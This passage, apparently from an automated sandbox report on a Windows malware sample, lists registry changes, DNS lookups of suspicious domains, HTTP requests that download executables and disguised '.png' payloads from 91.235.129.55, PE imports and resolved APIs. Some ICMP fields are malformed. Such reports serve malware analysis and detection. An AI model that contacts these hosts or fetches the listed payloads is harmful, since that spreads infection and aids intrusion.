1631. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\DRIVERS\\intelppm.sys[PROCESSORWMI]",
1632. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\DRIVERS\\en-US\\intelppm.sys.mui[PROCESSORWMI]",
1633. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\System32\\Drivers\\portcls.SYS[PortclsMof]",
1634. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\System32\\Drivers\\en-US\\portcls.SYS.mui[PortclsMof]",
1635. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\DRIVERS\\monitor.sys[MonitorWMI]",
1636. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\{ECF6766C-2A67-4495-AB29-07508A8B88E1}\\data",
1637. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\{EF0E2588-90B9-412E-A552-5B4B15D00033}\\data"
1638. ]
1639.  
1640. [*] Deleted Registry Keys: [
1641. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\CompatibilityAdapter\\Signatures\\{D6266B5F-EE5F-44B6-BEAC-5B0C0EB01EC5}.job",
1642. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\CompatibilityAdapter\\Signatures\\{D6266B5F-EE5F-44B6-BEAC-5B0C0EB01EC5}.job.fp",
1643. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\CompatibilityAdapter\\Signatures\\BrowserDatStorage.job",
1644. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\CompatibilityAdapter\\Signatures\\BrowserDatStorage.job.fp",
1645. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\CompatibilityAdapter\\Signatures\\MNU Net libraries.job",
1646. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\CompatibilityAdapter\\Signatures\\MNU Net libraries.job.fp",
1647. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\LastServiceStart",
1648. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
1649. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
1650. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName",
1651. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName",
1652. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\DRIVERS\\monitor.sys[MonitorWMI]"
1653. ]
1654.  
1655. [*] DNS Communications: [
1656. {
1657. "type": "A",
1658. "request": "mozambiquest.pw",
1659. "answers": []
1660. },
1661. {
1662. "type": "A",
1663. "request": "ransmittend.club",
1664. "answers": [
1665. {
1666. "data": "",
1667. "type": "NXDOMAIN"
1668. }
1669. ]
1670. },
1671. {
1672. "type": "A",
1673. "request": "summerch.xyz",
1674. "answers": [
1675. {
1676. "data": "",
1677. "type": "NXDOMAIN"
1678. }
1679. ]
1680. },
1681. {
1682. "type": "A",
1683. "request": "ignorepairs.pro",
1684. "answers": [
1685. {
1686. "data": "",
1687. "type": "NXDOMAIN"
1688. }
1689. ]
1690. },
1691. {
1692. "type": "A",
1693. "request": "consequencycle.pw",
1694. "answers": [
1695. {
1696. "data": "141.255.166.157",
1697. "type": "A"
1698. }
1699. ]
1700. },
1701. {
1702. "type": "A",
1703. "request": "harbournal.club",
1704. "answers": [
1705. {
1706. "data": "141.255.166.157",
1707. "type": "A"
1708. }
1709. ]
1710. },
1711. {
1712. "type": "A",
1713. "request": "thussailled.pw",
1714. "answers": [
1715. {
1716. "data": "141.255.166.157",
1717. "type": "A"
1718. }
1719. ]
1720. },
1721. {
1722. "type": "A",
1723. "request": "tradication.pw",
1724. "answers": [
1725. {
1726. "data": "141.255.166.157",
1727. "type": "A"
1728. }
1729. ]
1730. },
1731. {
1732. "type": "A",
1733. "request": "minoriticipal.pw",
1734. "answers": [
1735. {
1736. "data": "141.255.166.157",
1737. "type": "A"
1738. }
1739. ]
1740. },
1741. {
1742. "type": "A",
1743. "request": "seconominist.com",
1744. "answers": [
1745. {
1746. "data": "93.189.149.176",
1747. "type": "A"
1748. }
1749. ]
1750. },
1751. {
1752. "type": "A",
1753. "request": "importional.com",
1754. "answers": [
1755. {
1756. "data": "93.189.149.176",
1757. "type": "A"
1758. }
1759. ]
1760. },
1761. {
1762. "type": "A",
1763. "request": "mechangerous.space",
1764. "answers": [
1765. {
1766. "data": "185.143.145.90",
1767. "type": "A"
1768. }
1769. ]
1770. }
1771. ]
1772.  
1773. [*] Domains: [
1774. {
1775. "ip": "",
1776. "domain": "ransmittend.club"
1777. },
1778. {
1779. "ip": "",
1780. "domain": "ignorepairs.pro"
1781. },
1782. {
1783. "ip": "93.189.149.176",
1784. "domain": "mechangerous.space"
1785. },
1786. {
1787. "ip": "141.255.166.157",
1788. "domain": "thussailled.pw"
1789. },
1790. {
1791. "ip": "",
1792. "domain": "mozambiquest.pw"
1793. },
1794. {
1795. "ip": "141.255.166.157",
1796. "domain": "minoriticipal.pw"
1797. },
1798. {
1799. "ip": "141.255.166.157",
1800. "domain": "tradication.pw"
1801. },
1802. {
1803. "ip": "93.189.149.176",
1804. "domain": "seconominist.com"
1805. },
1806. {
1807. "ip": "",
1808. "domain": "summerch.xyz"
1809. },
1810. {
1811. "ip": "141.255.166.157",
1812. "domain": "consequencycle.pw"
1813. },
1814. {
1815. "ip": "141.255.166.157",
1816. "domain": "harbournal.club"
1817. },
1818. {
1819. "ip": "93.189.149.176",
1820. "domain": "importional.com"
1821. }
1822. ]
1823.  
1824. [*] Network Communication - ICMP: [
1825. {
1826. "src": "91.197.184.246",
1827. "dst": "169.254.255.254
1828. "type": 3,
1829. "data": ""
1830. },
1831. {
1832. "src": "91.197.184.246",
1833. "dst": "169.254.255.254
1834. "type": 3,
1835. "data": ""
1836. },
1837. {
1838. "src": "91.197.184.246",
1839. "dst": "169.254.255.254
1840. "type": 3,
1841. "data": ""
1842. }
1843. ]
1844.  
1845. [*] Network Communication - HTTP: [
1846. {
1847. "count": 1,
1848. "body": "",
1849. "uri": "http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab",
1850. "user-agent": "Microsoft-CryptoAPI/6.1",
1851. "method": "GET",
1852. "host": "www.download.windowsupdate.com",
1853. "version": "1.1",
1854. "path": "/msdownload/update/v3/static/trustedr/en/authrootstl.cab",
1855. "data": "GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1\r\nCache-Control: max-age = 86403\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Fri, 22 Feb 2019 16:53:13 GMT\r\nIf-None-Match: \"80e22c19cfcad41:0\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: www.download.windowsupdate.com\r\n\r\n",
1856. "port": 80
1857. },
1858. {
1859. "count": 1,
1860. "body": "",
1861. "uri": "http://91.235.129.55/Tini86_cr.exe",
1862. "user-agent": "",
1863. "method": "GET",
1864. "host": "91.235.129.55",
1865. "version": "1.1",
1866. "path": "/Tini86_cr.exe",
1867. "data": "GET /Tini86_cr.exe HTTP/1.1\r\nConnection: Keep-Alive\r\nHost: 91.235.129.55\r\n\r\n",
1868. "port": 80
1869. },
1870. {
1871. "count": 1,
1872. "body": "",
1873. "uri": "http://91.235.129.55/SWKLPFVBDX.exe",
1874. "user-agent": "",
1875. "method": "GET",
1876. "host": "91.235.129.55",
1877. "version": "1.1",
1878. "path": "/SWKLPFVBDX.exe",
1879. "data": "GET /SWKLPFVBDX.exe HTTP/1.1\r\nConnection: Keep-Alive\r\nHost: 91.235.129.55\r\n\r\n",
1880. "port": 80
1881. },
1882. {
1883. "count": 1,
1884. "body": "",
1885. "uri": "http://91.235.129.55/tin.exe",
1886. "user-agent": "",
1887. "method": "GET",
1888. "host": "91.235.129.55",
1889. "version": "1.1",
1890. "path": "/tin.exe",
1891. "data": "GET /tin.exe HTTP/1.1\r\nConnection: Keep-Alive\r\nHost: 91.235.129.55\r\n\r\n",
1892. "port": 80
1893. },
1894. {
1895. "count": 1,
1896. "body": "",
1897. "uri": "http://91.235.129.55/sin.png",
1898. "user-agent": "",
1899. "method": "GET",
1900. "host": "91.235.129.55",
1901. "version": "1.1",
1902. "path": "/sin.png",
1903. "data": "GET /sin.png HTTP/1.1\r\nConnection: Keep-Alive\r\nHost: 91.235.129.55\r\n\r\n",
1904. "port": 80
1905. },
1906. {
1907. "count": 1,
1908. "body": "",
1909. "uri": "http://thussailled.pw/data2.php?AC4DF4415831AF68",
1910. "user-agent": "",
1911. "method": "GET",
1912. "host": "thussailled.pw",
1913. "version": "1.1",
1914. "path": "/data2.php?AC4DF4415831AF68",
1915. "data": "GET /data2.php?AC4DF4415831AF68 HTTP/1.1\r\nHost: thussailled.pw\r\nUpgrade: websocket\r\nConnection: Upgrade\r\n\r\n",
1916. "port": 80
1917. },
1918. {
1919. "count": 1,
1920. "body": "",
1921. "uri": "http://91.235.129.55/tin.png",
1922. "user-agent": "WinHTTP loader/1.0",
1923. "method": "GET",
1924. "host": "91.235.129.55",
1925. "version": "1.1",
1926. "path": "/tin.png",
1927. "data": "GET /tin.png HTTP/1.1\r\nCache-Control: no-cache\r\nConnection: Keep-Alive\r\nPragma: no-cache\r\nUser-Agent: WinHTTP loader/1.0\r\nHost: 91.235.129.55\r\n\r\n",
1928. "port": 80
1929. },
1930. {
1931. "count": 1,
1932. "body": "",
1933. "uri": "http://91.235.129.55/sin.png",
1934. "user-agent": "WinHTTP loader/1.0",
1935. "method": "GET",
1936. "host": "91.235.129.55",
1937. "version": "1.1",
1938. "path": "/sin.png",
1939. "data": "GET /sin.png HTTP/1.1\r\nCache-Control: no-cache\r\nConnection: Keep-Alive\r\nPragma: no-cache\r\nUser-Agent: WinHTTP loader/1.0\r\nHost: 91.235.129.55\r\n\r\n",
1940. "port": 80
1941. },
1942. {
1943. "count": 1,
1944. "body": "",
1945. "uri": "http://91.235.129.55/win.png",
1946. "user-agent": "",
1947. "method": "GET",
1948. "host": "91.235.129.55",
1949. "version": "1.1",
1950. "path": "/win.png",
1951. "data": "GET /win.png HTTP/1.1\r\nConnection: Keep-Alive\r\nHost: 91.235.129.55\r\n\r\n",
1952. "port": 80
1953. }
1954. ]
1955.  
1956. [*] Network Communication - SMTP: []
1957.  
1958. [*] Network Communication - Hosts: []
1959.  
1960. [*] Network Communication - IRC: []
1961.  
1962. [*] Static Analysis: {
1963. "pe": {
1964. "peid_signatures": null,
1965. "imports": [
1966. {
1967. "imports": [
1968. {
1969. "name": "VirtualAlloc",
1970. "address": "0x40505c"
1971. },
1972. {
1973. "name": "InterlockedCompareExchange",
1974. "address": "0x405060"
1975. },
1976. {
1977. "name": "GetStartupInfoA",
1978. "address": "0x405064"
1979. },
1980. {
1981. "name": "TerminateProcess",
1982. "address": "0x405068"
1983. },
1984. {
1985. "name": "GetCurrentProcess",
1986. "address": "0x40506c"
1987. },
1988. {
1989. "name": "UnhandledExceptionFilter",
1990. "address": "0x405070"
1991. },
1992. {
1993. "name": "SetUnhandledExceptionFilter",
1994. "address": "0x405074"
1995. },
1996. {
1997. "name": "IsDebuggerPresent",
1998. "address": "0x405078"
1999. },
2000. {
2001. "name": "QueryPerformanceCounter",
2002. "address": "0x40507c"
2003. },
2004. {
2005. "name": "GetTickCount",
2006. "address": "0x405080"
2007. },
2008. {
2009. "name": "GetCurrentThreadId",
2010. "address": "0x405084"
2011. },
2012. {
2013. "name": "GetCurrentProcessId",
2014. "address": "0x405088"
2015. },
2016. {
2017. "name": "GetCurrentDirectoryA",
2018. "address": "0x40508c"
2019. },
2020. {
2021. "name": "GetModuleHandleA",
2022. "address": "0x405090"
2023. },
2024. {
2025. "name": "Sleep",
2026. "address": "0x405094"
2027. },
2028. {
2029. "name": "LoadLibraryW",
2030. "address": "0x405098"
2031. },
2032. {
2033. "name": "GetProcAddress",
2034. "address": "0x40509c"
2035. },
2036. {
2037. "name": "CreateFileMappingW",
2038. "address": "0x4050a0"
2039. },
2040. {
2041. "name": "MapViewOfFile",
2042. "address": "0x4050a4"
2043. },
2044. {
2045. "name": "InterlockedExchange",
2046. "address": "0x4050a8"
2047. },
2048. {
2049. "name": "GetSystemTimeAsFileTime",
2050. "address": "0x4050ac"
2051. }
2052. ],
2053. "dll": "KERNEL32.dll"
2054. },
2055. {
2056. "imports": [
2057. {
2058. "name": "LoadImageA",
2059. "address": "0x405174"
2060. },
2061. {
2062. "name": "GetDC",
2063. "address": "0x405178"
2064. },
2065. {
2066. "name": "UpdateWindow",
2067. "address": "0x40517c"
2068. },
2069. {
2070. "name": "SetWindowRgn",
2071. "address": "0x405180"
2072. },
2073. {
2074. "name": "MoveWindow",
2075. "address": "0x405184"
2076. },
2077. {
2078. "name": "GetWindowRgn",
2079. "address": "0x405188"
2080. },
2081. {
2082. "name": "DrawIconEx",
2083. "address": "0x40518c"
2084. },
2085. {
2086. "name": "GetClientRect",
2087. "address": "0x405190"
2088. },
2089. {
2090. "name": "GetWindowTextA",
2091. "address": "0x405194"
2092. },
2093. {
2094. "name": "DestroyIcon",
2095. "address": "0x405198"
2096. },
2097. {
2098. "name": "EndPaint",
2099. "address": "0x40519c"
2100. },
2101. {
2102. "name": "BeginPaint",
2103. "address": "0x4051a0"
2104. },
2105. {
2106. "name": "SetCapture",
2107. "address": "0x4051a4"
2108. },
2109. {
2110. "name": "SendMessageA",
2111. "address": "0x4051a8"
2112. },
2113. {
2114. "name": "GetParent",
2115. "address": "0x4051ac"
2116. },
2117. {
2118. "name": "GetWindowLongA",
2119. "address": "0x4051b0"
2120. },
2121. {
2122. "name": "ReleaseCapture",
2123. "address": "0x4051b4"
2124. },
2125. {
2126. "name": "GetWindowRect",
2127. "address": "0x4051b8"
2128. },
2129. {
2130. "name": "SetWindowLongA",
2131. "address": "0x4051bc"
2132. },
2133. {
2134. "name": "CreateDialogParamA",
2135. "address": "0x4051c0"
2136. },
2137. {
2138. "name": "GetDlgItem",
2139. "address": "0x4051c4"
2140. },
2141. {
2142. "name": "ReleaseDC",
2143. "address": "0x4051c8"
2144. },
2145. {
2146. "name": "PostQuitMessage",
2147. "address": "0x4051cc"
2148. },
2149. {
2150. "name": "MessageBoxA",
2151. "address": "0x4051d0"
2152. },
2153. {
2154. "name": "DefWindowProcA",
2155. "address": "0x4051d4"
2156. },
2157. {
2158. "name": "LoadCursorA",
2159. "address": "0x4051d8"
2160. },
2161. {
2162. "name": "LoadIconA",
2163. "address": "0x4051dc"
2164. },
2165. {
2166. "name": "RegisterClassA",
2167. "address": "0x4051e0"
2168. },
2169. {
2170. "name": "CreateWindowExA",
2171. "address": "0x4051e4"
2172. },
2173. {
2174. "name": "ShowWindow",
2175. "address": "0x4051e8"
2176. },
2177. {
2178. "name": "GetMessageA",
2179. "address": "0x4051ec"
2180. },
2181. {
2182. "name": "TranslateMessage",
2183. "address": "0x4051f0"
2184. },
2185. {
2186. "name": "DispatchMessageA",
2187. "address": "0x4051f4"
2188. }
2189. ],
2190. "dll": "USER32.dll"
2191. },
2192. {
2193. "imports": [
2194. {
2195. "name": "CreateCompatibleBitmap",
2196. "address": "0x405000"
2197. },
2198. {
2199. "name": "GetRegionData",
2200. "address": "0x405004"
2201. },
2202. {
2203. "name": "DeleteDC",
2204. "address": "0x405008"
2205. },
2206. {
2207. "name": "DeleteObject",
2208. "address": "0x40500c"
2209. },
2210. {
2211. "name": "CombineRgn",
2212. "address": "0x405010"
2213. },
2214. {
2215. "name": "CreateRectRgn",
2216. "address": "0x405014"
2217. },
2218. {
2219. "name": "GetPixel",
2220. "address": "0x405018"
2221. },
2222. {
2223. "name": "SelectObject",
2224. "address": "0x40501c"
2225. },
2226. {
2227. "name": "SaveDC",
2228. "address": "0x405020"
2229. },
2230. {
2231. "name": "GetObjectA",
2232. "address": "0x405024"
2233. },
2234. {
2235. "name": "CreateCompatibleDC",
2236. "address": "0x405028"
2237. },
2238. {
2239. "name": "GetRgnBox",
2240. "address": "0x40502c"
2241. },
2242. {
2243. "name": "CreateRectRgnIndirect",
2244. "address": "0x405030"
2245. },
2246. {
2247. "name": "BitBlt",
2248. "address": "0x405034"
2249. },
2250. {
2251. "name": "FrameRgn",
2252. "address": "0x405038"
2253. },
2254. {
2255. "name": "TextOutA",
2256. "address": "0x40503c"
2257. },
2258. {
2259. "name": "SetTextColor",
2260. "address": "0x405040"
2261. },
2262. {
2263. "name": "GetTextExtentPoint32A",
2264. "address": "0x405044"
2265. },
2266. {
2267. "name": "SetBkMode",
2268. "address": "0x405048"
2269. },
2270. {
2271. "name": "CreateFontA",
2272. "address": "0x40504c"
2273. },
2274. {
2275. "name": "PtInRegion",
2276. "address": "0x405050"
2277. },
2278. {
2279. "name": "GetStockObject",
2280. "address": "0x405054"
2281. }
2282. ],
2283. "dll": "GDI32.dll"
2284. },
2285. {
2286. "imports": [
2287. {
2288. "name": "??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ",
2289. "address": "0x4050b4"
2290. },
2291. {
2292. "name": "??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z",
2293. "address": "0x4050b8"
2294. },
2295. {
2296. "name": "??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z",
2297. "address": "0x4050bc"
2298. },
2299. {
2300. "name": "??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z",
2301. "address": "0x4050c0"
2302. },
2303. {
2304. "name": "??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ",
2305. "address": "0x4050c4"
2306. },
2307. {
2308. "name": "?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ",
2309. "address": "0x4050c8"
2310. },
2311. {
2312. "name": "?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ",
2313. "address": "0x4050cc"
2314. }
2315. ],
2316. "dll": "MSVCP90.dll"
2317. },
2318. {
2319. "imports": [
2320. {
2321. "name": "__p__fmode",
2322. "address": "0x4050d4"
2323. },
2324. {
2325. "name": "__p__commode",
2326. "address": "0x4050d8"
2327. },
2328. {
2329. "name": "_adjust_fdiv",
2330. "address": "0x4050dc"
2331. },
2332. {
2333. "name": "__setusermatherr",
2334. "address": "0x4050e0"
2335. },
2336. {
2337. "name": "_configthreadlocale",
2338. "address": "0x4050e4"
2339. },
2340. {
2341. "name": "_initterm_e",
2342. "address": "0x4050e8"
2343. },
2344. {
2345. "name": "__set_app_type",
2346. "address": "0x4050ec"
2347. },
2348. {
2349. "name": "_acmdln",
2350. "address": "0x4050f0"
2351. },
2352. {
2353. "name": "exit",
2354. "address": "0x4050f4"
2355. },
2356. {
2357. "name": "_ismbblead",
2358. "address": "0x4050f8"
2359. },
2360. {
2361. "name": "_XcptFilter",
2362. "address": "0x4050fc"
2363. },
2364. {
2365. "name": "_exit",
2366. "address": "0x405100"
2367. },
2368. {
2369. "name": "_cexit",
2370. "address": "0x405104"
2371. },
2372. {
2373. "name": "_crt_debugger_hook",
2374. "address": "0x405108"
2375. },
2376. {
2377. "name": "_except_handler4_common",
2378. "address": "0x40510c"
2379. },
2380. {
2381. "name": "?terminate@@YAXXZ",
2382. "address": "0x405110"
2383. },
2384. {
2385. "name": "?_type_info_dtor_internal_method@type_info@@QAEXXZ",
2386. "address": "0x405114"
2387. },
2388. {
2389. "name": "_invoke_watson",
2390. "address": "0x405118"
2391. },
2392. {
2393. "name": "_controlfp_s",
2394. "address": "0x40511c"
2395. },
2396. {
2397. "name": "_initterm",
2398. "address": "0x405120"
2399. },
2400. {
2401. "name": "malloc",
2402. "address": "0x405124"
2403. },
2404. {
2405. "name": "strlen",
2406. "address": "0x405128"
2407. },
2408. {
2409. "name": "fclose",
2410. "address": "0x40512c"
2411. },
2412. {
2413. "name": "fwrite",
2414. "address": "0x405130"
2415. },
2416. {
2417. "name": "fopen",
2418. "address": "0x405134"
2419. },
2420. {
2421. "name": "free",
2422. "address": "0x405138"
2423. },
2424. {
2425. "name": "??3@YAXPAX@Z",
2426. "address": "0x40513c"
2427. },
2428. {
2429. "name": "strcat",
2430. "address": "0x405140"
2431. },
2432. {
2433. "name": "fread",
2434. "address": "0x405144"
2435. },
2436. {
2437. "name": "feof",
2438. "address": "0x405148"
2439. },
2440. {
2441. "name": "strcmp",
2442. "address": "0x40514c"
2443. },
2444. {
2445. "name": "_unlock",
2446. "address": "0x405150"
2447. },
2448. {
2449. "name": "__dllonexit",
2450. "address": "0x405154"
2451. },
2452. {
2453. "name": "_encode_pointer",
2454. "address": "0x405158"
2455. },
2456. {
2457. "name": "_lock",
2458. "address": "0x40515c"
2459. },
2460. {
2461. "name": "_onexit",
2462. "address": "0x405160"
2463. },
2464. {
2465. "name": "_decode_pointer",
2466. "address": "0x405164"
2467. },
2468. {
2469. "name": "_amsg_exit",
2470. "address": "0x405168"
2471. },
2472. {
2473. "name": "__getmainargs",
2474. "address": "0x40516c"
2475. }
2476. ],
2477. "dll": "MSVCR90.dll"
2478. }
2479. ],
2480. "digital_signers": null,
2481. "exported_dll_name": null,
2482. "actual_checksum": "0x000159b5",
2483. "overlay": null,
2484. "imagebase": "0x00400000",
2485. "reported_checksum": "0x000159b5",
2486. "icon_hash": null,
2487. "entrypoint": "0x00403ceb",
2488. "timestamp": "2019-06-18 14:23:08",
2489. "osversion": "5.0",
2490. "sections": [
2491. {
2492. "name": ".text",
2493. "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ",
2494. "virtual_address": "0x00001000",
2495. "size_of_data": "0x00003400",
2496. "entropy": "5.92",
2497. "raw_address": "0x00000400",
2498. "virtual_size": "0x000033af",
2499. "characteristics_raw": "0x60000020"
2500. },
2501. {
2502. "name": ".rdata",
2503. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
2504. "virtual_address": "0x00005000",
2505. "size_of_data": "0x0000c200",
2506. "entropy": "6.18",
2507. "raw_address": "0x00003800",
2508. "virtual_size": "0x0000c1c8",
2509. "characteristics_raw": "0x40000040"
2510. },
2511. {
2512. "name": ".data",
2513. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
2514. "virtual_address": "0x00012000",
2515. "size_of_data": "0x00000200",
2516. "entropy": "1.51",
2517. "raw_address": "0x0000fa00",
2518. "virtual_size": "0x000004b4",
2519. "characteristics_raw": "0xc0000040"
2520. },
2521. {
2522. "name": ".rsrc",
2523. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
2524. "virtual_address": "0x00013000",
2525. "size_of_data": "0x00000400",
2526. "entropy": "5.19",
2527. "raw_address": "0x0000fc00",
2528. "virtual_size": "0x000002b0",
2529. "characteristics_raw": "0x40000040"
2530. }
2531. ],
2532. "resources": [],
2533. "dirents": [
2534. {
2535. "virtual_address": "0x00000000",
2536. "name": "IMAGE_DIRECTORY_ENTRY_EXPORT",
2537. "size": "0x00000000"
2538. },
2539. {
2540. "virtual_address": "0x0001057c",
2541. "name": "IMAGE_DIRECTORY_ENTRY_IMPORT",
2542. "size": "0x00000078"
2543. },
2544. {
2545. "virtual_address": "0x00013000",
2546. "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE",
2547. "size": "0x000002b0"
2548. },
2549. {
2550. "virtual_address": "0x00000000",
2551. "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION",
2552. "size": "0x00000000"
2553. },
2554. {
2555. "virtual_address": "0x00000000",
2556. "name": "IMAGE_DIRECTORY_ENTRY_SECURITY",
2557. "size": "0x00000000"
2558. },
2559. {
2560. "virtual_address": "0x00000000",
2561. "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC",
2562. "size": "0x00000000"
2563. },
2564. {
2565. "virtual_address": "0x00005230",
2566. "name": "IMAGE_DIRECTORY_ENTRY_DEBUG",
2567. "size": "0x0000001c"
2568. },
2569. {
2570. "virtual_address": "0x00000000",
2571. "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT",
2572. "size": "0x00000000"
2573. },
2574. {
2575. "virtual_address": "0x00000000",
2576. "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR",
2577. "size": "0x00000000"
2578. },
2579. {
2580. "virtual_address": "0x00000000",
2581. "name": "IMAGE_DIRECTORY_ENTRY_TLS",
2582. "size": "0x00000000"
2583. },
2584. {
2585. "virtual_address": "0x00010330",
2586. "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG",
2587. "size": "0x00000040"
2588. },
2589. {
2590. "virtual_address": "0x00000000",
2591. "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT",
2592. "size": "0x00000000"
2593. },
2594. {
2595. "virtual_address": "0x00005000",
2596. "name": "IMAGE_DIRECTORY_ENTRY_IAT",
2597. "size": "0x000001fc"
2598. },
2599. {
2600. "virtual_address": "0x00000000",
2601. "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT",
2602. "size": "0x00000000"
2603. },
2604. {
2605. "virtual_address": "0x00000000",
2606. "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR",
2607. "size": "0x00000000"
2608. },
2609. {
2610. "virtual_address": "0x00000000",
2611. "name": "IMAGE_DIRECTORY_ENTRY_RESERVED",
2612. "size": "0x00000000"
2613. }
2614. ],
2615. "exports": [],
2616. "guest_signers": {},
2617. "imphash": "a5e07b9d885d7be2b11371ae68839d0c",
2618. "icon_fuzzy": null,
2619. "icon": null,
2620. "pdbpath": "c:\\Users\\User\\Desktop\\DReY_Shape1667871152003\\Release\\ShapeGradientButton.pdb",
2621. "imported_dll_count": 5,
2622. "versioninfo": []
2623. }
2624. }
2625.  
2626. [*] Resolved APIs: [
2627. "uxtheme.dll.ThemeInitApiHook",
2628. "user32.dll.IsProcessDPIAware",
2629. "dwmapi.dll.DwmIsCompositionEnabled",
2630. "advapi32.dll.CryptAcquireContextA",
2631. "cryptsp.dll.CryptAcquireContextA",
2632. "advapi32.dll.CryptImportKey",
2633. "advapi32.dll.CryptEncrypt",
2634. "cryptsp.dll.CryptImportKey",
2635. "cryptbase.dll.SystemFunction040",
2636. "cryptbase.dll.SystemFunction041",
2637. "cryptsp.dll.CryptEncrypt",
2638. "kernel32.dll.SortGetHandle",
2639. "kernel32.dll.SortCloseHandle",
2640. "crypt32.dll.CryptProtectData",
2641. "kernel32.dll.LoadLibraryA",
2642. "kernel32.dll.GetProcAddress",
2643. "secur32.dll.GetUserNameExW",
2644. "userenv.dll.CreateEnvironmentBlock",
2645. "user32.dll.wsprintfA",
2646. "user32.dll.wsprintfW",
2647. "wtsapi32.dll.WTSQueryUserToken",
2648. "shlwapi.dll.StrStrA",
2649. "shlwapi.dll.StrStrIW",
2650. "shlwapi.dll.StrChrA",
2651. "shlwapi.dll.StrStrIA",
2652. "netapi32.dll.NetApiBufferFree",
2653. "netapi32.dll.NetWkstaGetInfo",
2654. "netapi32.dll.NetGetDCName",
2655. "dnsapi.dll.DnsFree",
2656. "dnsapi.dll.DnsQuery_A",
2657. "msvcrt.dll.memcpy",
2658. "msvcrt.dll.memset",
2659. "msvcrt.dll._vsnprintf",
2660. "kernel32.dll.lstrcpyA",
2661. "kernel32.dll.Sleep",
2662. "kernel32.dll.CreateThread",
2663. "kernel32.dll.SetErrorMode",
2664. "kernel32.dll.SetEvent",
2665. "kernel32.dll.WaitForSingleObject",
2666. "kernel32.dll.CreateEventW",
2667. "kernel32.dll.GetComputerNameExW",
2668. "kernel32.dll.lstrlenW",
2669. "kernel32.dll.CreateProcessA",
2670. "kernel32.dll.OpenEventW",
2671. "kernel32.dll.lstrcpyW",
2672. "kernel32.dll.SetUnhandledExceptionFilter",
2673. "kernel32.dll.ExitProcess",
2674. "kernel32.dll.CreateProcessW",
2675. "kernel32.dll.GetSystemTimeAsFileTime",
2676. "kernel32.dll.lstrcatW",
2677. "kernel32.dll.CopyFileW",
2678. "kernel32.dll.ExpandEnvironmentStringsA",
2679. "kernel32.dll.CreateFileA",
2680. "kernel32.dll.CreateFileW",
2681. "kernel32.dll.GetFileSize",
2682. "kernel32.dll.ReadFile",
2683. "kernel32.dll.WriteFile",
2684. "kernel32.dll.HeapReAlloc",
2685. "kernel32.dll.QueryPerformanceCounter",
2686. "kernel32.dll.QueryPerformanceFrequency",
2687. "kernel32.dll.GetTickCount",
2688. "kernel32.dll.GetNativeSystemInfo",
